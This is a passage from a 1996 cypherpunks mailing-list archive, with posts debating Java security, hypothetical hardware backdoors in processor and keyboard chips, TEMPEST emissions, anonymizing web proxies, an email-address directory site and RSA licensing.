bit -- they have it forced about halfway now...

To get a round peg, they have to build a system at the A2 trust level.
That means a verified design, and an implementation checked against
that design.  Sun hasn't done the design side of the game, if the
comments made about the design by the Princeton group are accurate.

Lacking a verifiable design, even Sun's implementation must be
doubted.  But it doesn't end there, the browser that surrounds the
byte code engine can compromise even a good implementation (as
netscape has demonstrated), and last, Sun has no way to ensure that
everything that executes the byte codes is a "good" implementation.
We don't even have to assume malicious intent on the engine builder,
accidents have already supplied us with enough examples of how it can
go wrong. (tho it is easier if you put the hole there -- you don't
have to be skilled enough to find a hole to exploit, just good enough
to add a hole to an existing implementation)

<dp>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Sat, 27 Apr 1996 16:28:22 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <199604251236.OAA09404@utopia.hacktic.nl>
Message-ID: <Pine.LNX.3.91.960426235849.371H-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Anonymous wrote:
> It is because of such baseless inferences, I have to remain anonymous.  I would
> dearly love to debate under my real name, but am prevented from doing so by the
> neo-Nazi name-calling.

	No, you aren't. Get a fscking freenet account so we can take this 
to email.

> Yes you are correct, I disagree that Abraham Lincoln was better than those in
> the South, not for racial reasons (remember, the Civil War was *not* about
> slavery, because the slavery issue only arised *after* the war started), but

	No, the war was over states rights and economics. Slavery was one 
of the issues involved in the states rights debates. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Sat, 27 Apr 1996 16:47:17 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
In-Reply-To: <m0uCa4r-00094aC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960427002329.371K-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, jim bell wrote:
> 
> This analysis seems to assume that the entire production run of a standard 
> product is subverted.  More likely,I think, an organization like the NSA 
> might build a pin-compatible version of an existing, commonly-used product 
> like a keyboard encoder chip that is designed to transmit (by RFI signals) 
> the contents of what is typed at the keyboard.  It's simple, it's hard to 
> detect, and it gets what they want.

	I thought that most (all?) chips already radiated on the 
electromagnetic spectrum? Isn't that what tempest is about?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Sat, 27 Apr 1996 19:47:00 +0800
To: sameer@c2.org
Subject: Re: The Joy of Java
In-Reply-To: <199604270040.RAA09526@atropos.c2.org>
Message-ID: <Pine.SV4.3.91.960427003947.6962C-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996 sameer@c2.org wrote:

> > 
> > I go further. Java, as envisioned, cannot be made secure. It is too
> > powerful a language. Furthermore, it is unnecessary for the tasks that
> 
> 	Even though that is all it is used for now, I think it was
> *intended* to be used for more.

At Usenix 96 in San Diego it was pointed out that applets are an abberation.
This is a complete language designed to displace C++, Visual Basic and
other OO languages.  Thinking of Java as simpy a Web enhancement tool
is short sighted.

Personally it is more attractive than C++ for product development and
we are trying to get it on FreeBSD, SCO UnixWare and SCO OSR5.  Using 
Java for applets _only_ is like fucking your mother... Most of us are
not into it.

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: des@juno.com (David E Smith)
Date: Sat, 27 Apr 1996 18:31:46 +0800
To: unicorn@schloss.li
Subject: Re: alias servers  (al la alias.c2.org)
In-Reply-To: <Pine.SUN.3.93.960426203004.12146H-100000@polaris.mindport.net>
Message-ID: <19960427.020607.14462.3.des@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 26 Apr 1996 20:30:38 -0400 (EDT) Black Unicorn
<unicorn@schloss.li> writes:
>
>Is anyone besides c2.org running an alias server?
>

There's a few of them - nym.gondolin.org, nym.alias.net, and
alias.alias.net are the others that leap to mind just now.
Of course, having just previewed the Juno "free-email"
service, I might count it also.

dave (really dsmith@midwest.net - pay no
attention to the nym behind the curtain!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rich@c2.org (Rich Graves)
Date: Sat, 27 Apr 1996 20:46:49 +0800
To: cypherpunks@toad.com
Subject: www.WhosWhere.com selling access to my employer's passwd file
Message-ID: <199604270912.CAA07530@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you are involved with the affairs of a large organization, I urge you
to check www.whoswhere.com to see if they have a bunch of user email
addresses that they shouldn't.

Of course there is little that one can do about this kind of invasion of
privacy. But they don't have to be so fucking blatant and stupid about it.
They have the email addresses of DAEMONS from our password files in their
database.

There is no need for mailbombing, or anything like that. Our lawyers are
simply going to nuke them from orbit. Please check them out before they go
offline, so that you will have a shot at whatever is left.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYHku43DXUbM57SdAQGQpwP/U9TzWE2vEjHYZo4eniVctFe3pVe0KIQe
FvdNOWTykqfgEyhagKuifmRwUgjjIcIZONzRDw1Hi7UrJbOghH3j9sW5wxsphbxU
3U0hHuKumAczUHn03IVkkF4JpobawEgHqqP1Y++PhNopAvqnVSu+hnf5aIS1R390
MlUiwpoo0OE=
=+Mm2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Apr 1996 20:50:53 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <199604270939.CAA07905@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> By NSA standards, it is simple.  NSA has probably had its own
>> semiconductor  fabs for 30+ years.
>Yep. Regardless of whether the fabs are government property or not,
>it's a sure thing that some contractors have appropriately SCIFfed
>fabs and appropriately cleared staffs.

There's an interesting Moore's Law wrinkle to this.  Not only
does processor speed double every 18 months, but the cost of the
chip fab plant for each generation of technology also doubles.
Intel's building some $2B plants now, and who knows what the
x886 CPU and 256MB memory fab plants will cost.  While the costs
are somewhat lower for a low-volume plant than a high-volume one,
at some point it will be much harder (as a percentage of their
total budget) for the NSA to stay ahead of the power curve,
and they'll have to switch over to designs like highly-custom
applications on commercial FPGAs and such.

And "appropriately cleared staffs" are also harder to find as
the chip business internationalizes.  Back when I was a tool
of the military-industrial complex, I was working on an RFP that
had a heavy-duty "buy American" policy, not only for economic
protectionism but to make sure that UnAmerican Foreigners didn't
subvert the designs for critical components to add security leaks.
For instance, the controller chips for disk drives, and raw EPROM.
We eventually got them to let us use imported commercial
products as long as any design and construction that was actually 
specific to the customer was done in the US, on the assumption that
the Singaporean Espionage Service wasn't going to put back-doors in
all the disk drives their city exported, and the Korean CIA
wasn't going to put extra pins in their EPROMS that would replace
the contents with hacked versions designed to steal US Secrets :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Apr 1996 21:01:41 +0800
To: cypherpunks@toad.com
Subject: Re: WWW proxies?
Message-ID: <199604270939.CAA07910@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:13 PM 4/26/96 -0400, Black Unicorn <unicorn@schloss.li> wrote:
>Has anyone developed such a beast yet?

Good timing for the question!  As Perry pointed out, the CERN
httpd provides basic proxy functions, but it doesn't do the
anonymizing job of deleting/replacing information your
browser may output to a CGI script, so it's only a partial solution.

The pre-beta-test anonymizer proxy Sameer mentioned does the main
protocols, though doesn't anonymize https: yet; doing the job
right is difficult or impossible without support in the browser
for features such as double-encrypted SSL sessions (one layer
of encryption between the browser and proxy, and an end-to-end
connection between the browser and the destination server.)
        [Jeff - any chance of this unlikely feature being supported?]
I tried doing an https: connection to the proxy, but something
wasn't in the directory it expected; that's what betas are for :-)
Alternatively, maybe an SSH connection could work?

>Will we have as extensive a WWW proxy network as remailer network?

That's partly a technical question, and partly a social/economic one.
The technical parts are whether it's easy to install an anonymizer
on your web server (at least for Unix and maybe NT users),
and whether there's a big drawback if you do, like performance hit
or extra charges from your ISP.  There's also a technical issue
of whether anon-proxies will be quiet underground things,
or whether there'll be some convenient coordination mechanism,
such as random.anonymizer.com being a DNS hack that picks a
random anonymous server that can be temporarily registered
by just starting an anonymizer application.

The social parts of the question are how we get people to _want_
to install it, and how we get them to keep running it once
it gets annoying.  A good PR job can help, especially if
installation+registration is a one-or-two-button thing;
using one anonymizer nags you to install your own.

Perhaps somebody will find a convenient way to add
only-mildly-annoying advertising to the anonymizers,
or to collect digicash without discouraging users,
giving some tradeoff between social responsibiity and
crass profit motives, and allowing a spectrum of 
anonymizers to operate.  Of course, especially with
some profit-making services (e.g. the Anonymous Porn Proxy
or the Hemp Buyers' Privacy Connection)
the server may have trouble convincing customers that
the anonymity is really being preserved, whether from
government subpoenas, junkmail and credit card fraud,
or future resale to Blacknet.

The other side of the propagation problem is keeping
proxy providers willing to run their services after they
have problems because of how their service is used.
One problem is spammers and other abusers.
Suppose somebody uses your anonymizer to connect to
a web-posting page or mailto: and spams a big mailing list
or newsgroup with objectionable material, like the
<perjorative deleted> spammer who sent hate mail from my
remailer to the various gay newsgroups signed with
some innocent bystander's name.  At best you get flamed;
at worst your ISP drops your service.  Or the spammer
signs the guestbook at whitehouse.gov in an interesting manner.

Another problem is users whose behaviour attracts attention.  
Maybe it's the highly legitimate user who checks out the 
tax forms on irs.gov for taxable activities the IRS didn't know 
were involved in, like overseas banking and stocks when
_your_ tax returns all said "broke college student" (just _try_
explaining anonymizers to the compuer-illiterate IRS clerk.)
Maybe it's the user who wants to avoid junk email when she
checks out the Make.Money.Fast.multilevel.religious.technology
stockbroker service.  Guess who's now on Their lists.
Maybe they used the anonymizer to view child pornography from
kidporn.sting.postalinspector.memphis.usps.gov, and the 
Post Office Police come kick your door down.   Or maybe
they were checking out the schedule at the Cannabis Buyer's Club
using your anonymizer just in case the FBI wiretappers wanted to
enforce laws that the S.F. Police don't bother people about.

Some of these problems can be helped by things like transient
proxy servers, if we build a convenient way for them to hook in
for a while and drop back out.  On the other hand, if you're waiting
for me to write all this code I'm suggesting we need, you'd
be better off hacking some more easy partial solutions that can
be deployed, tested, and replaced with the next edition :-)



#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Apr 1996 20:48:46 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <199604270944.CAA07981@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From my perspective, the biggest win of Java isn't the security,
though that's certainly important.  It's that it's a reasonably
powerful virtual machine that doesn't need to run on Microsoft
operating systems, though it can (except Win3.1, of course.)
That means that decent small application software can be written
that doesn't have to be locked into the far less secure/reliable
DOS/Windows/95 architectures, and can run on Macs and Linux and Unix,
a bit slowly, but with a lot less baggage.  (Maybe 16-bit code
is gone from NT 4.0, but it's not going to run on 386s!?!)

Yes, you may want to be careful with code that autoloads from web pages,
but you don't have to be quite as paranoid with Java from ftp sites
as you did with MS binaries, and you can be more comfortable with
applets like word processors and data-crunchers knowing they won't
be doing all the "helpful" things MSOffice likes to help you with.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Apr 1996 21:38:03 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Click here to become an International Arms Trafficker
Message-ID: <199604271013.DAA08223@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 PM 4/26/96 -0700, Sandy wrote:
>> Well, I'm ITAR violator # 6 :-)
>I am #3.  Who is #1?  Gee, that sounds sorta familiar.  I hope
>we don't end up as Prisoners.

You are in the Village.  A low crawl leads off to the north....

I was #21 and #22, though the first one didn't actually export crypto,
and the second one exported code for rot13 instead of perl.
So there's now some rot13 hanging out in the Caribbean,
waiting for Hostile Foreigners and NarcoTerrorist Tax Evaders
to protect their privacy with it.  (This is _illegal_??)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 28 Apr 1996 04:22:27 +0800
To: cypherpunks@toad.com
Subject: [;)]
Message-ID: <v03006609ada7c6731b3b@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


<http://www.well.com/user/ddt/info/jet-reply.html>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 27 Apr 1996 22:33:00 +0800
To: snow@crash.suba.com (Snow)
Subject: Re: trusting the processor chip
In-Reply-To: <Pine.LNX.3.91.960427002329.371K-100000@crash.suba.com>
Message-ID: <199604271104.HAA01654@nrk.com>
MIME-Version: 1.0
Content-Type: text


> > More likely,I think, an organization like the NSA 
> > might build a pin-compatible version of an existing, commonly-used product 
> > like a keyboard encoder chip that is designed to transmit (by RFI signals) 
> > the contents of what is typed at the keyboard.  It's simple, it's hard to 
> > detect, and it gets what they want.
> 
> 	I thought that most (all?) chips already radiated on the 
> electromagnetic spectrum? Isn't that what tempest is about?

A) Yes, all circuitry radiates to some extent. The variable is
the "some" factor. And is the noise compromising or just revealing?
[Does it allow the Opposition to know you are typing, or WHAT you
are typing...?] And the one everyone here seems to ignore -- can you
hear it from where you need to? [I know of one National Lab with a
blanket Tempest exemption -- it's a MILE to the uncontrolled border
area.]

B) Sure the Fort has Fab facilities. But Acme Gas & Grocery fixes
cars, yet they do NOT have the diagnostic computer for my [in my
dreams..] new BMW.

Preventium & leading edge chips requires MASSIVE amounts of
money for the infrastructure, and yesterday's versions do not cut
it. [Tim, got any real $$ here?] I suspect it's like monitors: 14"
SVGA's cost $200; 16" $650; 19" $1200 & 21", don't ask. Sure,
tomorrow the 16" is $500, but you need it TODAY.

The Fort is too busy trying to justify its FTE numbers to blow
a couple zillion on keeping current with fab stuff. Plus, in
a business with only a few customers, how does they keep the
stepper-supplier from wising up?

And when Mr. Bill introduces the 686, do you start all over?

C) Would the Fort *really* ask for & get the needed cooperation
while the industry fights CrippleChip/GAK?

D) There are far cheaper ways to attack, as others point it. Neuter
the power-supply controller chip, and it stays the same for
generations. Or go for the video RAMDAC.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Apr 1996 22:43:41 +0800
To: cypherpunks@toad.com
Subject: Cell Kill 2
Message-ID: <199604271127.HAA17044@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-27-96 NYT op-ed claims:

      On April 21, two Russian laser-guided missiles
      reportedly zeroed in on the cellular phone of Dzhokhar
      M. Dudayev, leader of the Chechen rebels, and killed
      him.

      According to the Russian newspaper Izvestia, Mr. Dudayev
      died while phoning an aide to King Hassan II of Morocco,
      who had been asked by President Yeltsin to help mediate
      an end to the war. Will any leader ever again be so
      gullible?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 28 Apr 1996 03:16:02 +0800
To: rich@c2.org (Rich Graves)
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <199604270912.CAA07530@Networking.Stanford.EDU>
Message-ID: <199604271430.HAA03553@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


They are gone now.

mark.allyn.com% lynx http://www.WhosWhere.com

lynx: Can't access start file http://www.WhosWhere.com

mark.allyn.com% telnet www.whoswhere.com
www.whoswhere.com: unknown host

They are still registered with Internic:

mark.allyn.com% dig whoswhere.com any

; <<>> DiG 2.0 <<>> whoswhere.com any 
;; ->>HEADER<<- opcode: QUERY , status: NOERROR, id: 6
;; flags: qr rd ra ; Ques: 1, Ans: 2, Auth: 2, Addit: 2
;; QUESTIONS: 
;;      whoswhere.com, type = ANY, class = IN

;; ANSWERS:
whoswhere.com.  172787  NS      CHARON.PSC.EDU.
whoswhere.com.  172787  NS      ATTICA.MAGICALFOX.com.

;; AUTHORITY RECORDS:
WHOSWHERE.com.  172787  NS      CHARON.PSC.EDU.
WHOSWHERE.com.  172787  NS      ATTICA.MAGICALFOX.com.

;; ADDITIONAL RECORDS:
CHARON.PSC.EDU. 172787  A       128.182.65.6
ATTICA.MAGICALFOX.com.  172787  A       204.170.102.34






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 28 Apr 1996 03:16:21 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [NOISE] What is "laser material"?
In-Reply-To: <2.2.32.19960426175657.00ae9254@mail.teleport.com>
Message-ID: <199604271436.HAA03567@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


-> The problem with laser based weapons is they are weather dependant.  Try
-> using a laser in the rain and see how coherent a beam you get.

-> What this has to do with crypto, I have no idea...  (Maybe they are going to
-> try and etch RSA in four lines of Perl into the side of the whitehouse.)

Of course they should etch it in both text and bar code so that a foreign
spy satalite with a bar code reader can read it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Apr 1996 05:53:18 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
Message-ID: <2.2.32.19960427162824.00ab39d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 AM 4/27/96 -0700, Rich Graves wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>If you are involved with the affairs of a large organization, I urge you
>to check www.whoswhere.com to see if they have a bunch of user email
>addresses that they shouldn't.

They also have some information that is seriously outdated.  They have two
e-mail addresses for me that are about 2-3 years out of date.  (I wonder how
some of this information was collected.  One was from my Fidonet point
address of years back.  Not something accesable from finger.)

>Of course there is little that one can do about this kind of invasion of
>privacy. But they don't have to be so fucking blatant and stupid about it.
>They have the email addresses of DAEMONS from our password files in their
>database.

I wonder if those addresses are from a "finger @sitename.org" hack.  It
becomes worrysome when the methods of hackers intersect with those of
database compilers.

>There is no need for mailbombing, or anything like that. Our lawyers are
>simply going to nuke them from orbit. Please check them out before they go
>offline, so that you will have a shot at whatever is left.

Keep us informed as to the fireworks.  it will be fun to watch.

---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Apr 1996 05:52:24 +0800
To: Mark Allyn 206-860-9454 <rich@c2.org (Rich Graves)
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
Message-ID: <2.2.32.19960427162826.00ab5bc4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 AM 4/27/96 -0700, Mark Allyn 206-860-9454 wrote:
>They are gone now.
>
>mark.allyn.com% lynx http://www.WhosWhere.com

Try http://www.whowhere.com/ .  (Rich Graves mistyped the address.)


---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 28 Apr 1996 06:23:45 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <ada8110401021004e1c4@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:53 AM 4/25/96, Jeffrey C. Flynn wrote:
....
>
>It looks like I may have no other option than to give some processor some
>degree of trust. Which processor I should choose, and why that one?
....
In the days of microcode this was my best (worst?) scenario. Setting up for
fast divide has been an art long before Pentium divide fame. In microcode
you don't spend time testing for cases that you can prove won't happen.
Some obscure cases can arise only with a rare combinations of two 48 bit
operands. The microcode flaw would be to put the processor into privileged
mode even while getting the right answer. There would plausible deniability
even if the flaw were discovered. (Gosh, I didn't test for this fall thru
case because here is the proof that it can't happen.) Of course there is a
bug in the proof but no one reads proofs. This can now be exploited by
anyone that knows what division leaves the machine in privileged state.

This is an attack on those systems that are rated to run untrusted machine
code, using privileged mode code to limit the operation of the untrusted
code.

Only one person is necessary to pull this off. He must be trusted to
produce microcode and the implementer of the divide algorithm. Test code
will not find the transition to privileged code just because you can't test
the whole machine state after every tested instruction. Normally the bogus
privileged state of the machine will quickly expire (on the next interrupt)
and will cause no permanent state change even in those few cases where a
magic division occurs naturally.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Apr 1996 06:43:50 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <ada79e9200021004908e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 AM 4/27/96, Dan Busarow wrote:

>At Usenix 96 in San Diego it was pointed out that applets are an abberation.
>This is a complete language designed to displace C++, Visual Basic and
>other OO languages.  Thinking of Java as simpy a Web enhancement tool
>is short sighted.
>
>Personally it is more attractive than C++ for product development and
>we are trying to get it on FreeBSD, SCO UnixWare and SCO OSR5.  Using
>Java for applets _only_ is like fucking your mother... Most of us are
>not into it.

Ignoring the gross violation of the CDA, I agree.

I think of it (and so do a lot of others) as:

- a cleaned-up C++, with features of Smalltalk, Objective-C, and Lisp

- a tool with built-in hooks for Net-centric computing

- some safety features that distinguish it from C++ and the like

- a bytecode/virtual machine approach that means the same code can be run
on any platform for which a VM exists (the key to applets, but also the key
to portability...what the world might have looked like for the past 15
years has the UCSD p-system succeeded instead of MS-DOS)

Is it safe to run untrusted applets on your machine? Probably not. Running
strange programs probably is never safe.

I don't view this as something any new language is likely to solve, unless
it's a language with such limited expressability as to be "safe and
boring."

As Perry has noted, financial institutions can ill afford to have applets
being dropped into their main computers unless they are safe and secure.
Not too surprising. But, then, they also have other security issues they
constantly have to deal with that others don't.

I suspect the safety issues will continue to crop up, but will be dealt
with in other ways. The signed classes approach, the approaches used in E,
etc. Netscape's limits on what applets can do, for example, may be extended
in other ways (a kind of firewall approach?).

To borrow a viewpoint, I don't expect the Java-based gargoyles in "True
Names" to be "trustworthy"...TANSTAAFL.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 28 Apr 1996 05:12:36 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
Message-ID: <2.2.32.19960427014653.0069df44@gateway>
MIME-Version: 1.0
Content-Type: text/plain


At 07:27 AM 04/27/96 -0400, John Young <jya@pipeline.com> wrote:
>   4-27-96 NYT op-ed claims:
>
>      On April 21, two Russian laser-guided missiles
>      reportedly zeroed in on the cellular phone of Dzhokhar
>      M. Dudayev, leader of the Chechen rebels, and killed

Okay, I'll play: are we supposed to believe that a laser(optically)-guided
missile homed in on a cellular(RF) phone?

C'mon now. Who was driving the *real* targeting laser?

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Apr 1996 07:06:40 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <ada7a2f20102100497bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


First, there ain't no way that electromagnetic radiation is going to be
detected coming from the surface of a ULSI chip. Radiated power levels are
going to be in nanowatt or picowatt level from any one metal or poly line,
and of course will be undetectable at any distance. Not to mention the size
of the radiator implies inefficient launch of pulses (the lines are likely
to be rarely longer than a millimeter).


At 11:04 AM 4/27/96, David Lesher wrote:
(quoting someone else)
>> > More likely,I think, an organization like the NSA
>>       I thought that most (all?) chips already radiated on the
>> electromagnetic spectrum? Isn't that what tempest is about?

TEMPEST is not about emissions from the surface of a ULSI chip, for
example, but about the emissions (and controlling them, shielding them,
detecting them) from equipment in general.

Most of the "van Eck" radiation (so-called because he wrote the first major
public papers on this mode) comes from the deflection circuitry for CRTs,
where the radiated power levels (and lengths of radiating elements) are
considerably larger than what I mentioned above. It is the CRTs that mostly
cause problems.

The PCBs inside modern computers also emit wideband pulses, and this may be
detectable and usable to an adversary. Good shielding practice helps (those
little FCC stickers....). TEMPEST deals with suppressing the emission even
more.

>B) Sure the Fort has Fab facilities. But Acme Gas & Grocery fixes
>cars, yet they do NOT have the diagnostic computer for my [in my
>dreams..] new BMW.
>
>Preventium & leading edge chips requires MASSIVE amounts of
>money for the infrastructure, and yesterday's versions do not cut
>it. [Tim, got any real $$ here?] I suspect it's like monitors: 14"
>SVGA's cost $200; 16" $650; 19" $1200 & 21", don't ask. Sure,
>tomorrow the 16" is $500, but you need it TODAY.

I hate to say it, but all this stuff has been covered extensively in the
past, in the archives.

Yes, the NSA has its own wafer fab. Or, more precisely, the most recent
example I know of is that National Semiconductor accepted a contract to
build a fab at Fort Meade. This is not surprising, as the NSA is
responsible for supplying coding and ciphering materials to U.S. forces
worldwide, and so must generate ROMs, PLAs, and other special chips to
cipher machines around the world. Having the fab at the Fort helps
security.

(Sandia Labs also makes such gizmos for them, and has pretty good security,
I suspect.)

These wafer fabs are probably 1.25 micron fabs, far from the .35 micron
fabs now being used to make the 166 MHz Pentiums you can buy at Price Club.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Apr 1996 10:15:26 +0800
To: Snow <cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <m0uDEIm-00093vC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 AM 4/27/96 -0500, Snow wrote:
>On Thu, 25 Apr 1996, jim bell wrote:
>> 
>> This analysis seems to assume that the entire production run of a standard 
>> product is subverted.  More likely,I think, an organization like the NSA 
>> might build a pin-compatible version of an existing, commonly-used product 
>> like a keyboard encoder chip that is designed to transmit (by RFI signals) 
>> the contents of what is typed at the keyboard.  It's simple, it's hard to 
>> detect, and it gets what they want.
>
>	I thought that most (all?) chips already radiated on the 
>electromagnetic spectrum? Isn't that what tempest is about?

There's a difference between trying to find a needle in a haystack, and 
finding a day-glo, red-hot needle that plays music at 110 decibels in that 
same haystack.  Digital logic chips do radiate EMI, but some radiate very 
little (because their are few logic transitions or they occur relatively 
infrequently) or are buried within other circuitry and they don't have a 
particularly good antenna.  The Trojan horse chip I'm hypothesizing would be 
specifically designed to radiate a fairly loud, continuous signal, on wires 
that are long enough to make a good antenna.  Ideally, the chip would have a 
crystal to produce a very constant frequency, so that other noise not on 
that frequency could be ignored.

The best place to put such a chip would be a location outside the computer's 
case, or at least it would have access to the outside.  I think that a 
keyboard controller would be optimum, because I suspect that there are a 
relatively small number of different designs.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Sun, 28 Apr 1996 07:28:24 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Fwd: RSAREF dos not give you access to RSA
In-Reply-To: <960427060855_76703.407_CHN32-1@CompuServe.COM>
Message-ID: <v03006601ada81036cb69@[157.22.240.191]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:48 PM on 4/26/96 , David Mazieres <dm@amsterdam.lcs.mit.edu> wrote:
>After many many messages, I got bounced around from RSA to Consensys
>Corp. and back to RSA.

Just an FYI, Consensus Development (not Consensys) can only offer a
commercial licenses to RSAREF. Some such licenses we can grant waivers to
user lower-level routines -- to date we've granted waivers for SSL and PGP
compatible software.

>Conclusion:  You can't use the RSA algorithm in free software.  The
>RSAREF interface is too restrictive, and when RSA says in the license
>that "RSA will grant all reasonable requests for permission to make
